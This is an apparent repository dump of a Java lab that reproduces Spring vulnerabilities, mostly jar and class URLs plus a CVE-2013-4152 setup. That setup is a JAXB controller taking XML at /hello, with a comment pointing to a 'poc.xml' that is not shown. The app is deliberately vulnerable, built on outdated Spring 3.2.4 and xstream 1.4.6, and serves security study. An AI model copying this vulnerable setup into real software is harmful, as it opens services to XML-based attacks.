│ │ │ ├── WebSocketConfig$2.class
│ │ │ └── WebSocketConfig.class
│ │ │ ├── controller
│ │ │ └── WebSocketController.class
│ │ │ ├── interceptor
│ │ │ ├── ReceiveMessageChannelInterceptor.class
│ │ │ ├── SendMessageChannelInterceptor.class
│ │ │ └── WebSocketHandshakeInterceptor.class
│ │ │ └── websocket
│ │ │ └── event
│ │ │ ├── StompConnectEventListener.class
│ │ │ ├── StompConnectedEventListener.class
│ │ │ └── StompSubscribeEventListener.class
│ │ └── static
│ │ ├── app.js
│ │ ├── bootstrap.min.css
│ │ ├── index.html
│ │ ├── jquery-1.10.2.min.js
│ │ ├── main.css
│ │ └── stomp.js
└── Spring-WebSocket-without-STOMP
│ ├── HELP.md
│ ├── demo.iml
│ ├── mvnw
│ ├── mvnw.cmd
│ ├── pom.xml
│ ├── src
│ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── example
│ │ │ └── demo
│ │ │ ├── BinarySocketHandler.java
│ │ │ ├── DemoApplication.java
│ │ │ ├── ProtocolBufferSocketHandler.java
│ │ │ ├── SocketHandler.java
│ │ │ └── WebSocketConfig.java
│ │ └── resources
│ │ ├── application.properties
│ │ └── static
│ │ ├── app.js
│ │ ├── bootstrap.min.css
│ │ ├── index.html
│ │ ├── jquery-1.10.2.min.js
│ │ └── main.css
│ └── target
│ ├── classes
│ ├── application.properties
│ ├── com
│ │ └── example
│ │ │ └── demo
│ │ │ ├── BinarySocketHandler.class
│ │ │ ├── DemoApplication.class
│ │ │ ├── ProtocolBufferSocketHandler.class
│ │ │ ├── SocketHandler.class
│ │ │ └── WebSocketConfig.class
│ └── static
│ │ ├── app.js
│ │ ├── bootstrap.min.css
│ │ ├── index.html
│ │ ├── jquery-1.10.2.min.js
│ │ └── main.css
│ ├── demo-0.0.1-SNAPSHOT.jar
│ ├── demo-0.0.1-SNAPSHOT.jar.original
│ ├── maven-archiver
│ └── pom.properties
│ └── maven-status
│ └── maven-compiler-plugin
│ └── compile
│ └── default-compile
│ ├── createdFiles.lst
│ └── inputFiles.lst
├── README.md
└── SpringConfigTest
├── SpringConfigTest.iml
├── out
└── artifacts
│ └── SpringConfigTest_war_exploded
│ ├── META-INF
│ └── MANIFEST.MF
│ ├── WEB-INF
│ ├── classes
│ │ ├── invoker-client.xml
│ │ ├── invoker-dispatcher-servlet.xml
│ │ ├── org
│ │ │ ├── example
│ │ │ │ ├── Controller
│ │ │ │ │ ├── Client.class
│ │ │ │ │ └── TestController.class
│ │ │ │ └── User
│ │ │ │ │ ├── IUserService.class
│ │ │ │ │ ├── User.class
│ │ │ │ │ ├── UserService.class
│ │ │ │ │ └── UserServiceImpl.class
│ │ │ └── sglab
│ │ │ │ └── vuln
│ │ │ │ ├── entity
│ │ │ │ ├── Message.class
│ │ │ │ └── User.class
│ │ │ │ └── service
│ │ │ │ ├── IUserService.class
│ │ │ │ └── Impl
│ │ │ │ └── UserServiceImpl.class
│ │ └── spring
│ │ │ ├── invoker-client.xml
│ │ │ └── spring-remote.xml
│ └── web.xml
│ ├── index.jsp
│ └── resources
│ ├── invoker-client.xml
│ ├── invoker-dispatcher-servlet.xml
│ └── spring
│ ├── invoker-client.xml
│ └── spring-remote.xml
├── pom.xml
├── src
└── org
│ └── example
│ ├── Controller
│ └── TestController.java
│ ├── User
│ ├── Client.java
│ ├── IUserService.java
│ ├── User.java
│ └── UserServiceImpl.java
│ └── Validate
│ ├── CaseMode.java
│ ├── CheckCase.java
│ └── CheckCaseValidator.java
└── web
├── WEB-INF
├── jsp
│ └── user.jsp
└── web.xml
├── index.jsp
└── resources
├── invoker-client.xml
├── invoker-dispatcher-servlet.xml
└── spring-mvc.xml
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/JaxbController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/JaxbController.class
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Mapper.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Mapper.class
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Order.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Order.class
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Settings.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Settings.class
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/User.class
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/jsp/hello.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: dxy
4 | Date: 2022/12/12
5 | Time: 6:33 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 |
10 |
11 | hello
12 |
13 |
14 | ${message}
15 |
16 |
17 |
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/jsp/test.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: dxy
4 | Date: 2022/12/19
5 | Time: 4:58 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 |
10 |
11 | Title
12 |
13 |
14 | ${test}
15 |
16 |
17 |
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/commons-fileupload-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/commons-fileupload-1.2.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/commons-logging-1.1.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/commons-logging-1.1.1.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/jstl-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/jstl-1.2.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-aop-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-aop-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-aspects-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-aspects-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-beans-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-beans-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-build-src-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-build-src-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-context-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-context-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-context-support-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-context-support-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-core-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-core-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-data-commons-1.5.0.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-data-commons-1.5.0.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-data-jpa-1.5.0.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-data-jpa-1.5.0.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-expression-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-expression-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-instrument-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-instrument-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-instrument-tomcat-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-instrument-tomcat-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-jdbc-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-jdbc-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-jms-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-jms-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-orm-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-orm-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-oxm-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-oxm-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-struts-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-struts-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-test-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-test-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-tx-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-tx-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-web-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-web-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-webmvc-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-webmvc-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-webmvc-portlet-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-webmvc-portlet-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/standard.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/standard.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xml-apis-1.4.01.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xml-apis-1.4.01.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xml-resolver-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xml-resolver-1.2.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xmlpull-1.1.3.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xmlpull-1.1.3.1.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xmlschema-core-2.2.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xmlschema-core-2.2.1.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xpp3_min-1.1.4c.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xpp3_min-1.1.4c.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xstream-1.4.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xstream-1.4.6.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
7 | CVE-2013-4152
8 |
9 | spring
10 |
11 | org.springframework.web.servlet.DispatcherServlet
12 |
13 | 1
14 |
15 |
16 | spring
17 | /
18 |
19 |
20 |
21 | index.jsp
22 |
23 |
--------------------------------------------------------------------------------
/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/index.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: dxy
4 | Date: 2022/12/20
5 | Time: 3:29 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 |
10 |
11 | $Title$
12 |
13 |
14 | CVE-2013-4152
15 |
16 |
17 |
--------------------------------------------------------------------------------
/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/JaxbController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/JaxbController.class
--------------------------------------------------------------------------------
/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Mapper.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Mapper.class
--------------------------------------------------------------------------------
/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Order.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Order.class
--------------------------------------------------------------------------------
/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Settings.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Settings.class
--------------------------------------------------------------------------------
/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/User.class
--------------------------------------------------------------------------------
/CVE-2013-4152/src/org/example/jaxb/JaxbController.java:
--------------------------------------------------------------------------------
1 | package org.example.jaxb;
2 |
3 | import org.springframework.stereotype.Controller;
4 | import org.springframework.ui.Model;
5 | import org.springframework.web.bind.annotation.RequestBody;
6 | import org.springframework.web.bind.annotation.RequestMapping;
7 | import org.springframework.web.bind.annotation.RequestMethod;
8 |
9 | @Controller
10 | public class JaxbController {
11 | @RequestMapping(value = "/hello", method = RequestMethod.POST, consumes = "application/xml")
12 | public String Order(@RequestBody Order order,Model model) {
13 | System.out.println("got Order");
14 | System.out.println(order.getId());
15 | model.addAttribute("message", order.getId());
16 | return "/hello";
17 | }
18 |
19 | // post poc.xml to /hello
20 | }
21 |
--------------------------------------------------------------------------------
/CVE-2013-4152/src/org/example/jaxb/Order.java:
--------------------------------------------------------------------------------
1 | package org.example.jaxb;
2 |
3 | import javax.xml.bind.annotation.XmlElement;
4 | import javax.xml.bind.annotation.XmlRootElement;
5 |
6 | @XmlRootElement(name="Order")
7 | public class Order {
8 | private String id;
9 |
10 | public String getId() {
11 | return id;
12 | }
13 |
14 | @XmlElement
15 | public void setId(String id) {
16 | this.id = id;
17 | }
18 | }
19 |
20 |
--------------------------------------------------------------------------------
/CVE-2013-4152/src/org/example/jaxb/Settings.java:
--------------------------------------------------------------------------------
1 | package org.example.jaxb;
2 |
3 | public class Settings {
4 | private boolean fooEnabled;
5 |
6 | public boolean isFooEnabled() {
7 | return fooEnabled;
8 | }
9 |
10 | public void setFooEnabled(boolean fooEnabled) {
11 | this.fooEnabled = fooEnabled;
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/jsp/hello.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: dxy
4 | Date: 2022/12/12
5 | Time: 6:33 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 |
10 |
11 | hello
12 |
13 |
14 | ${message}
15 |
16 |
17 |
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/jsp/test.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: dxy
4 | Date: 2022/12/19
5 | Time: 4:58 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 |
10 |
11 | Title
12 |
13 |
14 | ${test}
15 |
16 |
17 |
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/commons-fileupload-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/commons-fileupload-1.2.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/commons-logging-1.1.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/commons-logging-1.1.1.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/jstl-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/jstl-1.2.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-aop-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-aop-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-aspects-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-aspects-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-beans-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-beans-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-build-src-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-build-src-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-context-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-context-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-context-support-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-context-support-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-core-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-core-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-data-commons-1.5.0.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-data-commons-1.5.0.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-data-jpa-1.5.0.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-data-jpa-1.5.0.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-expression-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-expression-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-instrument-3.2.4.RELEASE.jar:
